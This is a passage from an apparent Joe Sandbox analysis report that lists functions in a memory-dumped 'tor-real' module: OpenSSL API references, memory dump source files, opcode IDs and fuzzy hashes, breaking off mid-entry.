                                                                            • Opcode ID: bc781dd9e9d749b5eddbd2c850cd5d9054647ab92609437005ea890f3a5e6cf7
                                                                            • Instruction ID: 57ac941bd609ee69b1266d469a0d8b0b565bd9ff470a972a796d7880beb41ee4
                                                                            • Opcode Fuzzy Hash: bc781dd9e9d749b5eddbd2c850cd5d9054647ab92609437005ea890f3a5e6cf7
                                                                            • Instruction Fuzzy Hash: B3415E71A492008BE7559AE8C48076F73F0EB4A348F714D26D464D7AD2D638DCC78F92
                                                                            Function 6C0E67A0 Relevance: 12.1, APIs: 8, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0E6823
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0E6837
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0E6841
                                                                            • EVP_PKEY_security_bits.LIBCRYPTO-1_1 ref: 6C0E6852
                                                                            • X509_get_extension_flags.LIBCRYPTO-1_1 ref: 6C0E688C
                                                                            • X509_get_signature_info.LIBCRYPTO-1_1 ref: 6C0E68BD
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0E69A0
                                                                              • Part of subcall function 6C0E67A0: X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0E6601
                                                                              • Part of subcall function 6C0E67A0: EVP_PKEY_security_bits.LIBCRYPTO-1_1 ref: 6C0E6616
                                                                              • Part of subcall function 6C0E67A0: X509_get_extension_flags.LIBCRYPTO-1_1 ref: 6C0E6657
                                                                              • Part of subcall function 6C0E67A0: X509_get_signature_info.LIBCRYPTO-1_1 ref: 6C0E668B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_valueX509_get0_pubkeyX509_get_extension_flagsX509_get_signature_infoY_security_bits$L_sk_num
                                                                            • String ID:
                                                                            • API String ID: 3955210016-0
                                                                            • Opcode ID: 64485f7006208e6dd6746cea52546aa80170f943be2db70fb3b5cae6a6d2f776
                                                                            • Instruction ID: 8c9df34d609cdcd6185e374e72cd5ffe6748a786475a33274beb83c0c588fec3
                                                                            • Opcode Fuzzy Hash: 64485f7006208e6dd6746cea52546aa80170f943be2db70fb3b5cae6a6d2f776
                                                                            • Instruction Fuzzy Hash: 894103B09493099FD3409F6AD58075FBBF4AF88358F518A2EE9E8C7740E738E4458B42
                                                                            Function 6C0A8791 Relevance: 12.0, APIs: 8, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A879F
                                                                            • OPENSSL_sk_insert.LIBCRYPTO-1_1 ref: 6C0A87B2
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A87BA
                                                                            • OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0A87C6
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A87DA
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A87EC
                                                                            • OPENSSL_sk_sort.LIBCRYPTO-1_1 ref: 6C0A87F6
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A8801
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_free$L_sk_dupL_sk_insertL_sk_numL_sk_set_cmp_funcL_sk_sortL_sk_value
                                                                            • String ID:
                                                                            • API String ID: 1412518800-0
                                                                            • Opcode ID: e96f9105ff2969a62896b3d7c8bd8e6ffc4651f22f544aab28ce1c6bb005a1d5
                                                                            • Instruction ID: 2d20f73c0a989f229d353c4bb5a65b4772cce82600334797cdeb588c0b35216f
                                                                            • Opcode Fuzzy Hash: e96f9105ff2969a62896b3d7c8bd8e6ffc4651f22f544aab28ce1c6bb005a1d5
                                                                            • Instruction Fuzzy Hash: A001C4B59497018FC700AFA4D4C03AEBBF1BF8C244F62482DE5989B701D734A5859F82
                                                                            Function 6C0B00DB Relevance: 10.6, APIs: 7, Instructions: 146COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ASYNC_get_current_job.LIBCRYPTO-1_1 ref: 6C0B0160
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B01CA
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B0200
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$C_get_current_job
                                                                            • String ID:
                                                                            • API String ID: 2484768174-0
                                                                            • Opcode ID: 49199527724ed9bc955275a1708b58547bc8dd37240cc0deba50ce3cf369dcd2
                                                                            • Instruction ID: 2969637acd95a75e6ac533b2fbdcece7fae8b991cab74ccb878709a323dc221b
                                                                            • Opcode Fuzzy Hash: 49199527724ed9bc955275a1708b58547bc8dd37240cc0deba50ce3cf369dcd2
                                                                            • Instruction Fuzzy Hash: AF5137B06083459FC710DF69C58074BBBF4BF88718F408A2DE8A9AB750D375E8498F86
                                                                            Function 6C0E8693 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0E866E
                                                                            • EVP_CIPHER_CTX_reset.LIBCRYPTO-1_1 ref: 6C0E86B0
                                                                            • EVP_CIPHER_CTX_new.LIBCRYPTO-1_1 ref: 6C0E88C0
                                                                            • memcpy.MSVCRT ref: 6C0E8A18
                                                                              • Part of subcall function 6C0E74F0: EVP_MD_size.LIBCRYPTO-1_1 ref: 6C0E7558
                                                                              • Part of subcall function 6C0E74F0: OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0E75B7
                                                                              • Part of subcall function 6C0B6E60: strlen.MSVCRT ref: 6C0B6E8E
                                                                              • Part of subcall function 6C0B6E60: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0B6EBC
                                                                              • Part of subcall function 6C0B6E60: strcpy.MSVCRT ref: 6C0B6EDE
                                                                              • Part of subcall function 6C0B6E60: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0B6FB1
                                                                              • Part of subcall function 6C0E7060: EVP_PKEY_CTX_new_id.LIBCRYPTO-1_1 ref: 6C0E70C1
                                                                              • Part of subcall function 6C0E7060: EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0E711F
                                                                            • EVP_MD_size.LIBCRYPTO-1_1 ref: 6C0E8B4F
                                                                            • memcpy.MSVCRT ref: 6C0E8BCD
                                                                            • memcpy.MSVCRT ref: 6C0E8C45
                                                                            • memcpy.MSVCRT ref: 6C0E8CB8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$D_sizeL_cleanse$O_clear_freeO_mallocX_freeX_newX_new_idX_resetstrcpystrlen
                                                                            • String ID: @$c ap traffic$s ap traffic$s hs traffic
                                                                            • API String ID: 163817395-2594031039
                                                                            • Opcode ID: d9ab6f8a0f685c8a1fbd025b39e5690e4239af86c40056581bb125e01b15e30b
                                                                            • Instruction ID: e19d7c0c452dde23b5319b79d618e5eb8ce9669f044b0ab836c4dde0d57fa812
                                                                            • Opcode Fuzzy Hash: d9ab6f8a0f685c8a1fbd025b39e5690e4239af86c40056581bb125e01b15e30b
                                                                            • Instruction Fuzzy Hash: 9051F2B1A493418FD710CF19C18075AFBF4BF89308F108A2EE8A89B751D775E948CB82
                                                                            Function 6C0EA4E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0EA503
                                                                            • BN_bin2bn.LIBCRYPTO-1_1 ref: 6C0EA525
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0EA53B
                                                                            • SRP_Calc_A.LIBCRYPTO-1_1 ref: 6C0EA55D
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0EA582
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Calc_D_priv_bytesL_cleanseN_bin2bn__stack_chk_fail
                                                                            • String ID: 0
                                                                            • API String ID: 2775472007-4108050209
                                                                            • Opcode ID: 04285996cdd2946838c9c294d11322ac614df5aecff54db07d1d8ccf592c7ca8
                                                                            • Instruction ID: b6dc5fada43ef4ba00bc5279ba30dd8a0cbf305df6b0749f13cc2ade1de34ea8
                                                                            • Opcode Fuzzy Hash: 04285996cdd2946838c9c294d11322ac614df5aecff54db07d1d8ccf592c7ca8
                                                                            • Instruction Fuzzy Hash: ED1119B16153018FCB00DF24C590B9ABBF6BF8C304F558879E8889B705EB35E945CB92
                                                                            Function 6C0A20CE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A1BE3
                                                                            • EC_KEY_get0_group.LIBCRYPTO-1_1 ref: 6C0A20D9
                                                                            • EC_GROUP_get_curve_name.LIBCRYPTO-1_1 ref: 6C0A20E9
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A242B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$P_get_curve_nameY_get0_group
                                                                            • String ID: C$|
                                                                            • API String ID: 374196510-633747002
                                                                            • Opcode ID: 9f511d799bdbe9940e966f747423552bb80e64d3ab504ec739c007837ae0b845
                                                                            • Instruction ID: 4c2ba6e25e04ac64cd2fd97d835a5acc1700a20ad07b6808e022189078f0fb22
                                                                            • Opcode Fuzzy Hash: 9f511d799bdbe9940e966f747423552bb80e64d3ab504ec739c007837ae0b845
                                                                            • Instruction Fuzzy Hash: C50129B140C306DEEB009FA1C44435EBBE0BF84358F418C1CE4E99B650E7B9E58A8F96
                                                                            Function 6C0E2CB0 Relevance: 9.1, APIs: 6, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0E2CBD
                                                                            • EVP_PKEY_id.LIBCRYPTO-1_1 ref: 6C0E2CCF
                                                                            • EVP_PKEY_id.LIBCRYPTO-1_1 ref: 6C0E2CF3
                                                                            • EVP_PKEY_get0_EC_KEY.LIBCRYPTO-1_1 ref: 6C0E2D02
                                                                            • EC_KEY_get0_group.LIBCRYPTO-1_1 ref: 6C0E2D0E
                                                                            • EC_GROUP_get_curve_name.LIBCRYPTO-1_1 ref: 6C0E2D16
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Y_id$P_get_curve_nameX509_get0_pubkeyY_get0_Y_get0_group
                                                                            • String ID:
                                                                            • API String ID: 2011593283-0
                                                                            • Opcode ID: 1abed27240420eb9c95855186b893ac5f5101c2598028926b22e90738cfbe8b1
                                                                            • Instruction ID: 99361686b39824959dba594eaca2037fee16c6394f36a5e5496d61bbebf2cd3e
                                                                            • Opcode Fuzzy Hash: 1abed27240420eb9c95855186b893ac5f5101c2598028926b22e90738cfbe8b1
                                                                            • Instruction Fuzzy Hash: 0021A5716897068EEF146E35C98836AB6E4EF4C348FA54D3ECA66CBB50E734D4818781
                                                                            Function 6C0D8E9B Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 177COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $D$O$P
                                                                            • API String ID: 0-1359717048
                                                                            • Opcode ID: 12ef805f4fd3e3a8fbf69dec707f5f3c020b223d09f019ac73b3991479adce2d
                                                                            • Instruction ID: c27139c740fa8c4552c64a518d2692dfa25bdcbb2463fb7f39cc9822563b2fcc
                                                                            • Opcode Fuzzy Hash: 12ef805f4fd3e3a8fbf69dec707f5f3c020b223d09f019ac73b3991479adce2d
                                                                            • Instruction Fuzzy Hash: 22715A702093018FE700CF25C4A479ABBF5AF85308F56CA6DE8988F655DB75E489CB92
                                                                            Function 6C092690 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Time$System$FileO_ctrl
                                                                            • String ID: -
                                                                            • API String ID: 3793654131-2547889144
                                                                            • Opcode ID: d2444f0f269fa82f8d14a39c893cbe950b1a5123387eb8e84b834a8119abb115
                                                                            • Instruction ID: 8ec8bd78176dd78c1bd0f8e5dd9f0cef0a8df536142a365a4d29725a9e839505
                                                                            • Opcode Fuzzy Hash: d2444f0f269fa82f8d14a39c893cbe950b1a5123387eb8e84b834a8119abb115
                                                                            • Instruction Fuzzy Hash: 724128B1A083059FCB40EF29C48439ABBE5FF84304F45C86DEC989B715DB34A509DBA2
                                                                            Function 6C0D4620 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • i2d_X509.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0D5F23), ref: 6C0D4643
                                                                              • Part of subcall function 6C094670: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0946A1
                                                                            • i2d_X509.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6C0D5F23), ref: 6C0D467D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509i2d_$O_zalloc
                                                                            • String ID: D$P
                                                                            • API String ID: 215832503-307317852
                                                                            • Opcode ID: 08562dfcf4a150688db6c8f7d30c01a3ce85fbdca7e8d1870027717bd1813348
                                                                            • Instruction ID: 1339019ce7e2e6ccb45927fc7dff6f433f395b6f66b3ab68e1529028d8a22220
                                                                            • Opcode Fuzzy Hash: 08562dfcf4a150688db6c8f7d30c01a3ce85fbdca7e8d1870027717bd1813348
                                                                            • Instruction Fuzzy Hash: 6331F7B0608301AFD300DF69D48075EBBE8BB89758F51892DF58887750D774E9889F93
                                                                            Function 6C0E8FC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_sizeL_cleansememcpy
                                                                            • String ID: @
                                                                            • API String ID: 2940768226-2766056989
                                                                            • Opcode ID: 1c350a979343a6ee1cf87a6a83d38af7332df2c5642b55fb657df3a858322425
                                                                            • Instruction ID: 1318593b5c710ba1f000eae02ecd084b042441faf9f8fb67397c1c6d90657bf8
                                                                            • Opcode Fuzzy Hash: 1c350a979343a6ee1cf87a6a83d38af7332df2c5642b55fb657df3a858322425
                                                                            • Instruction Fuzzy Hash: E03124B16097058FC710DF29C08079ABBF4BF88348F41896DE8989B305D736AA49CF92
                                                                            Function 6C0E0FEB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0ED1
                                                                            • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E1007
                                                                            • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E102F
                                                                            • EVP_CipherInit_ex.LIBCRYPTO-1_1 ref: 6C0E1067
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
